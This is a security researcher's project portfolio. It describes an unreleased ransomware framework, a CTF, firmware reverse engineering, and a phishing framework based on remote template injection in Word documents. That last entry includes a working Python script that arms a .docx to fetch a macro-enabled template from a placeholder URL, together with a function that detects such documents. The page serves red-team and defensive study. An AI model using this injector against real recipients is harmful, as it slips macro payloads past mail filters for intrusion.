Current Projects
X11 Synth
- Yes, that X11. No, I'm not elaborating on this one until it's finished.
Past Projects
EMR Album
- During a project on exfiltrating data from an air-gapped computer using TEMPEST emanations and sound, I was inspired by how pleasant electricity can sound. Using my monitor as an analog synth and some Python to generate a synth sequence, I'm mixing tracks together for a "sounds of electromagnetic radiation" album. Some of them sound surprisingly like music. The finished project, along with production details, is available here.
Ransomware Framework
- I wrote a piece of ransomware in C++17 using only the native Windows API as a proof of concept. The point is not to introduce more ransomware into the world, but to build a framework that a red team can customize quickly. This one, obviously, stays unreleased.
Remote Macro-Enabled Template Injection
- I developed a social engineering framework built around distributing malicious Word documents. It differs from SET in that it specializes in one and only one attack. The technique is well explained here, but in short: the delivered .docx contains no macros itself; its settings part references an external, macro-enabled template (.dotm), which Word fetches and loads when the document is opened. We go to this trouble because most networks filter .doc and .docm files as inherently malicious, while a plain .docx gets through. The framework tries to stay simple while still being powerful enough. One use is an IT team testing the efficacy of its security awareness training sessions.
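The mechanics of the injection, and the check that catches it, as an added example of my own (not the author's framework and not code from the original page): the script below builds a constructed, macro-free .docx skeleton in memory, adds an External attachedTemplate relationship plus the matching w:attachedTemplate element, and then scans a document for exactly that signature. It assumes Python 3.8+ with the standard library only; the template URL and UNC path are placeholders.

```python
"""Remote macro-enabled template injection into a .docx, and the check that catches it.

Added illustration for this page, not the author's framework.  make_sample_docx()
is a constructed, macro-free skeleton; the template URL in __main__ is a placeholder.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import List
from xml.sax.saxutils import quoteattr

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = R_NS + "/attachedTemplate"   # relationship type Word uses for a template
SETTINGS_PART = "word/settings.xml"
SETTINGS_RELS = "word/_rels/settings.xml.rels"

ET.register_namespace("w", W_NS)
ET.register_namespace("r", R_NS)


def make_sample_docx() -> bytes:
    """Constructed sample: the smallest .docx skeleton the helpers below need."""
    parts = {
        "[Content_Types].xml": (
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
            '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
            '<Default Extension="xml" ContentType="application/xml"/>'
            '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
            '<Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/>'
            "</Types>"),
        "_rels/.rels": (
            f'<Relationships xmlns="{PKG_REL_NS}">'
            f'<Relationship Id="rId1" Type="{R_NS}/officeDocument" Target="word/document.xml"/>'
            "</Relationships>"),
        "word/document.xml": (
            f'<w:document xmlns:w="{W_NS}"><w:body><w:p><w:r><w:t>Q3 report</w:t></w:r></w:p>'
            "</w:body></w:document>"),
        # Only elements the schema orders after w:attachedTemplate, so inserting the
        # template reference at index 0 keeps the part schema-ordered.
        SETTINGS_PART: f'<w:settings xmlns:w="{W_NS}"><w:defaultTabStop w:val="720"/></w:settings>',
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, body in parts.items():
            z.writestr(name, body)
    return buf.getvalue()


def inject_remote_template(docx: bytes, template_url: str) -> bytes:
    """Return a copy of docx whose settings part points at a remote attached template.

    The .docx stays macro-free (so it passes .doc/.docm filters); Word resolves the
    External attachedTemplate relationship on open and, if the target is a .dotm,
    loads its VBA subject to the usual macro security prompt.
    """
    src = zipfile.ZipFile(io.BytesIO(docx))

    # 1. Relationship entry in settings.xml.rels (create the part if the file has none).
    if SETTINGS_RELS in src.namelist():
        rels_xml = src.read(SETTINGS_RELS).decode("utf-8")
        used = {rel.get("Id") for rel in ET.fromstring(rels_xml)}
    else:
        rels_xml = f'<Relationships xmlns="{PKG_REL_NS}"></Relationships>'
        used = set()
    rid = next(f"rId{i}" for i in range(1, 10000) if f"rId{i}" not in used)
    entry = (f'<Relationship Id="{rid}" Type="{ATTACHED_TEMPLATE}" '
             f'Target={quoteattr(template_url)} TargetMode="External"/>')
    rels_xml = rels_xml.replace("</Relationships>", entry + "</Relationships>", 1)

    # 2. <w:attachedTemplate r:id="..."/> in settings.xml (in a real document it must
    #    sit at its schema position, after w:proofState; index 0 is correct here).
    settings = ET.fromstring(src.read(SETTINGS_PART))
    settings.insert(0, ET.Element(f"{{{W_NS}}}attachedTemplate", {f"{{{R_NS}}}id": rid}))

    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for item in src.infolist():
            if item.filename not in (SETTINGS_PART, SETTINGS_RELS):
                dst.writestr(item, src.read(item.filename))
        dst.writestr(SETTINGS_PART, ET.tostring(settings, encoding="UTF-8", xml_declaration=True))
        dst.writestr(SETTINGS_RELS, rels_xml)
    return out.getvalue()


def external_templates(docx: bytes) -> List[str]:
    """Detection side: remote template targets this .docx would fetch when opened.

    The signature is an attachedTemplate relationship with TargetMode="External";
    the file extension says nothing.  Suitable for a mail gateway or for scoring
    which recipients of a phishing exercise received an armed document.
    """
    z = zipfile.ZipFile(io.BytesIO(docx))
    if SETTINGS_RELS not in z.namelist():
        return []
    return [rel.get("Target") for rel in ET.fromstring(z.read(SETTINGS_RELS))
            if rel.get("Type") == ATTACHED_TEMPLATE and rel.get("TargetMode") == "External"]


def attached_template_ids(docx: bytes) -> List[str]:
    """r:id values referenced from settings.xml; each should resolve to a rels entry above."""
    settings = ET.fromstring(zipfile.ZipFile(io.BytesIO(docx)).read(SETTINGS_PART))
    return [el.get(f"{{{R_NS}}}id") for el in settings.iter(f"{{{W_NS}}}attachedTemplate")]


if __name__ == "__main__":
    clean = make_sample_docx()
    armed = inject_remote_template(clean, "https://templates.example.test/q3.dotm")  # placeholder
    print(external_templates(clean))   # []
    print(external_templates(armed))   # ['https://templates.example.test/q3.dotm']
```

Two practical notes. The target may be an HTTP(S) URL or a UNC path; Word resolves both, so a defensive scan should flag any External target rather than matching on a scheme. And the two parts must agree: a rels entry with no w:attachedTemplate referencing it is inert, which is why the detection helper and the r:id helper are kept separate.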
Feel Good CTF
- I put on a CTF geared towards high school students for three years. There were three categories of flags, ranging from easy to hard. Flags could be found in decoded Morse code, in the strings of a binary, or on a website that required the Wayback Machine. Scoring was handled with PHP and a basic SQL database. I later wrote an email verification process to grant access to a discussion board. I wrote the code for the frontend, backend, and database, as well as each flag.
Rediscovering CVE-2014-3936 in 2020
- I was reverse engineering "smart" device firmware, in this case the D-Link DSP-W215, a smart plug that can be controlled via Alexa, Google Assistant, or a smartphone. Its features include turning the plug on or off remotely, monitoring temperature, and monitoring energy usage. D-Link makes life easy by publishing all of its firmware online for anyone to download. Binwalk made quick work of extracting the filesystem and I was able to get to work. The first file I opened, soapclient.js, relied on an unfamiliar SOAP-over-HTTP protocol, HNAP (Home Network Administration Protocol). After some googling, it was apparent that the device shared the same class of vulnerability as most HNAP-based devices. I started looking at CVEs in this class and found one that mentioned this device by name. I did a bit more research on the firmware, including some MIPS32 emulation with QEMU, and wrote up a paper that won't quite fit here, but using HNAP was far from the only design flaw.